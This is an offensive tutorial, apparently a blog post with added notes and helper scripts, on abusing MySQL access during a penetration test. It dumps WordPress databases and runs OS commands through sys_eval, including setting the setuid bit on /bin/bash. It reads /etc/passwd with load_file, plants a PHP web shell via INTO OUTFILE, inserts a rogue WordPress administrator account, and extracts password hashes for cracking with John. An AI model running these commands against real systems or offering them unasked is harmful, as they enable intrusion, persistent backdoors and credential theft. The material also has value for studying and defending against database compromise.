
COMMAND LINE MYSQL FOR HACKERS

Knowing how to work with a MySQL server from the command line is useful in many situations, and
especially in penetration testing: it is quick, easy to learn, and usually the fastest way in once you hold a set of credentials.

General MySQL CLI

Connect to the Database

This command logs you into the MySQL server at host 192.168.0.26 as user “user”. A bare -p makes the client prompt for the password instead of taking it from the command line.

mysql -u user -p -h 192.168.0.26

Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 4
Server version: 5.7.28-0ubuntu0.16.04.2 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

MySQL [(none)]>

The banner comes from the MariaDB build of the mysql client shipped with Parrot; it talks to a stock MySQL 5.7 server without any trouble.

View and Connect to a Database

To list the databases the user you logged in with is allowed to see, use the “show databases” command. To make one of them the default for the queries that follow, use the “use” command.

show databases;

use databasename;

Tricks!
# run a statement non-interactively and exit (-e is the short form; handy in scripts and one-liners)

mysql -u user -p --execute="show databases"

Table Viewing and Manipulation

The two most important things to know are how to list the tables in a database and how to dump a table's rows.

show tables;

select * from tablename;

To see a table's schema (columns, types, keys) use the “describe” command.

describe tablename;

Advanced MySQL Commands for Hackers

Creating Local Database

create database wp_hacked;

use wp_hacked;

Importing a SQL file is easy. The target database must already exist: a dump taken without --databases contains no CREATE DATABASE statement, so create it first as above.

mysql -u root -p database < wp_db.sql

Exfiltrating the Database Schema

The user is “root” and the password is “plbkac”. Yes, there is no space between -p and the password; that is how the option works. Be aware that a password given this way is visible to every local user in the process list (ps) and ends up in your shell history, so prefer the interactive prompt or an option file when you can. --no-data dumps only the CREATE TABLE statements, no rows.

mysqldump --no-data -h 192.168.0.26 -u root -pplbkac wordpress > wp_db.sql

If you just want one table with no data, try this (-d is the short form of --no-data):

mysqldump -d -h 192.168.0.26 -u root -pplbkac wordpress wp_users > wp_users.sql
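A way to keep the password off the command line, added here as an example and not part of the original post: the mysql and mysqldump clients read credentials from an option file passed with --defaults-extra-file, so a mode-600 temporary file keeps the password out of ps and shell history. The host, user and password values are placeholders.

```shell
#!/bin/sh
# Added example (not from the original post): hand the MySQL password to the
# client through a 0600 option file via --defaults-extra-file instead of
# -pPASSWORD on the command line, where every local user can read it with ps.
# User, password and host below are placeholders supplied by the caller.

# write_mysql_opts USER PASSWORD HOST -> prints the path of a 0600 option file
write_mysql_opts() {
    user=$1; pass=$2; host=$3
    f=$(mktemp "${TMPDIR:-/tmp}/my.XXXXXX") || return 1
    chmod 600 "$f"                    # only the owner may read the password
    printf '[client]\nuser=%s\npassword=%s\nhost=%s\n' "$user" "$pass" "$host" > "$f"
    printf '%s\n' "$f"
}

# Usage (the --defaults-extra-file option must be the first option on the line):
#   OPTS=$(write_mysql_opts root plbkac 192.168.0.26)
#   mysqldump --defaults-extra-file="$OPTS" --no-data wordpress > wp_db.sql
#   mysql --defaults-extra-file="$OPTS" -e "show databases"
#   rm -f "$OPTS"                     # remove the file once the job is done
```

The same file works for mysql, mysqldump and the other clients because they all read the [client] group; delete it as soon as you are finished.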

Exfiltrating Data

--tab writes two files per table into the given directory: tablename.sql with the CREATE TABLE statement, written by the mysqldump client, and tablename.txt with the rows, which the server writes itself using SELECT ... INTO OUTFILE. The .txt file therefore lands on the database host, not on your machine, so this only works when mysqldump runs on the server itself, the mysqld user can write to the directory, and secure_file_priv allows it. Against a remote target, a plain mysqldump of the table (without --no-data) is the simpler way to pull the rows.

mysqldump --tab=/tmp -h 192.168.0.34 -u root -pplbkac wordpress wp_users

Running System Commands

sys_eval() is not a built-in MySQL function; it comes from the lib_mysqludf_sys UDF library and only exists if that library has been installed and registered on the server. Commands run as the operating-system user mysqld runs as (normally “mysql”), so the chmod trick below only yields a root shell if mysqld itself is running as root.

select sys_eval("whoami");

select sys_eval("chmod u+s /bin/bash");

Reading Data

It is possible to read sensitive files from the server's filesystem with load_file(). The account needs the FILE privilege, the file must be readable by the mysqld user, and on MySQL 5.7 the secure_file_priv variable may confine reads to a single directory (check it with show variables like 'secure_file_priv';). When any of these conditions is not met, load_file() silently returns NULL rather than an error.

select load_file("/etc/shells");

select load_file("/etc/passwd");

Create Backdoor PHP Script

This writes a PHP backdoor that executes commands on the server, from which you can easily call home with a reverse shell. It has the same prerequisites as load_file(): the FILE privilege, a secure_file_priv setting that does not exclude the destination, and a web directory the mysqld user can write to. INTO OUTFILE refuses to overwrite an existing file, so pick a filename that does not exist yet.

SELECT "<?php echo system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/wp-content/uploads/shell.php";

WordPress Privilege Escalation

You can create a new user with administrative access very easily using SQL. There are 2 tables and 3 sets of data that must be inserted to accomplish this. If you don't want to create a new user and have compromised a low privileged user, you can elevate that account by updating the wp_usermeta table: adjusting the meta_value for the meta_keys “wp_capabilities” and “wp_user_level” elevates access if done correctly. Both keys carry the site's table prefix, so on an install with a custom $table_prefix they are named <prefix>capabilities and <prefix>user_level.

This script isn't 100% accurate. WordPress no longer stores passwords as plain MD5 hashes; new passwords are salted and stretched by its portable phpass hasher (hashes beginning with $P$). For backwards compatibility wp_check_password() still accepts a bare 32-character MD5 hash and rehashes it on the first successful login, so MD5('demo') usually works; if it doesn't, you'll have to reset the password or copy in a known user's hash.

The key thing about WordPress is understanding how data is saved. Role data is stored as a PHP serialized array (the output of serialize()), not JSON:

a:1:{s:6:"author";b:1;}

You can't just change “author” to “administrator”. a:1 means an array with one element, s:6 means a string of exactly 6 bytes, and b:1 is boolean true. You must update the whole string consistently, including the length:

a:1:{s:13:"administrator";s:1:"1";}

(s:1:"1" is the string "1". WordPress itself writes b:1 here, and either form unserializes and grants the role, because the role is taken from the array key.)

You will need to find the highest existing ID (select max(ID) from wp_users;) and use a value above it; the insert fails if the ID already exists. Alternatively, omit the ID column so auto-increment assigns one, then use that value in the wp_usermeta rows.
INSERT INTO `wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('8', 'gotcha', MD5('demo'), 'Your Name', 'gotcha@hackaco.com', 'http://www.hackaco.com/', '2019-11-21 00:00:00', '', '0', 'L33t Haxor');

INSERT INTO `wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '8', 'wp_capabilities', 'a:1:{s:13:"administrator";s:1:"1";}');

INSERT INTO `wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '8', 'wp_user_level', '10');
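The elevate-an-existing-user path described above, and the serialized-length rule it depends on, as an added example that is not part of the original post. The helper builds the PHP serialized role array with the byte length computed rather than typed by hand, and emits the two UPDATE statements for the existing-user case; the user ID and table prefix are placeholders passed in by the caller, and the statements are printed so you can review them before piping them into mysql.

```shell
#!/bin/sh
# Added example (not from the original post). WordPress keeps a user's roles in
# wp_usermeta as a PHP serialize()d array, so the length after "s:" must match
# the role name exactly. These helpers build that value and the UPDATE
# statements that turn an existing user into an administrator. Table prefix,
# user ID and role are placeholders supplied by the caller.

# wp_caps ROLE -> serialized array {ROLE: true}, e.g. a:1:{s:13:"administrator";b:1;}
wp_caps() {
    role=$1
    # PHP counts bytes; stick to ASCII role names so ${#role} matches.
    printf 'a:1:{s:%d:"%s";b:1;}' "${#role}" "$role"
}

# wp_elevate_sql USER_ID [PREFIX] -> SQL that gives USER_ID the administrator role.
# The meta_key carries the table prefix (wp_ by default), so a site with a
# custom $table_prefix needs it passed as the second argument.
wp_elevate_sql() {
    uid=$1; prefix=${2:-wp_}
    caps=$(wp_caps administrator)
    printf "UPDATE %susermeta SET meta_value='%s' WHERE user_id=%d AND meta_key='%scapabilities';\n" \
        "$prefix" "$caps" "$uid" "$prefix"
    printf "UPDATE %susermeta SET meta_value='10' WHERE user_id=%d AND meta_key='%suser_level';\n" \
        "$prefix" "$uid" "$prefix"
}

# Usage: review the statements, then feed them to the client, e.g.
#   wp_elevate_sql 3 wp_ | mysql -u root -p -h 192.168.0.26 wordpress
```

The UPDATE only changes rows that already exist; a user who has never had a capabilities row (for example one you inserted into wp_users without the wp_usermeta rows) needs the INSERT statements shown above instead.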

Extracting WordPress Hashes for John

By concatenating the user login and the password hash with a colon between them we get the login:hash lines that John the Ripper expects.
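One way to produce that file from the client's batch output, added here as an example and not taken from the original post: mysql -B -N prints one tab-separated row per line with no header, which a short awk filter rewrites as login:hash. The sample rows are constructed and the hashes in them are made up.

```shell
#!/bin/sh
# Added example (not from the original post): convert the tab-separated rows
# printed by `mysql -B -N` into John the Ripper's login:hash format.

# to_john reads "login<TAB>hash" rows on stdin and prints "login:hash" lines
to_john() {
    awk -F'\t' 'NF >= 2 { print $1 ":" $2 }'
}

# Constructed sample rows shaped like the output of
#   mysql -B -N -e "SELECT user_login, user_pass FROM wp_users" wordpress
# The hashes are made up and crack to nothing.
sample_rows() {
    printf 'admin\t$P$BqVv2gGEhQ2sLk0N1WlYk9rLxw.hpm.\n'
    printf 'editor\t$P$B7hxT9QaLo3jDpR2mZ8kWnYc1Fv5Gt/\n'
}

# Usage against a live target (credentials as in the rest of this page):
#   mysql -B -N -u root -p -h 192.168.0.26 \
#       -e "SELECT user_login, user_pass FROM wp_users" wordpress | to_john > wp_hashes.txt
#   john --format=phpass wp_hashes.txt
sample_rows | to_john
```

Hashes starting with $P$ are WordPress's phpass format, which John's jumbo build handles with --format=phpass; any legacy 32-character MD5 values in the same dump need a separate run with --format=raw-md5.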
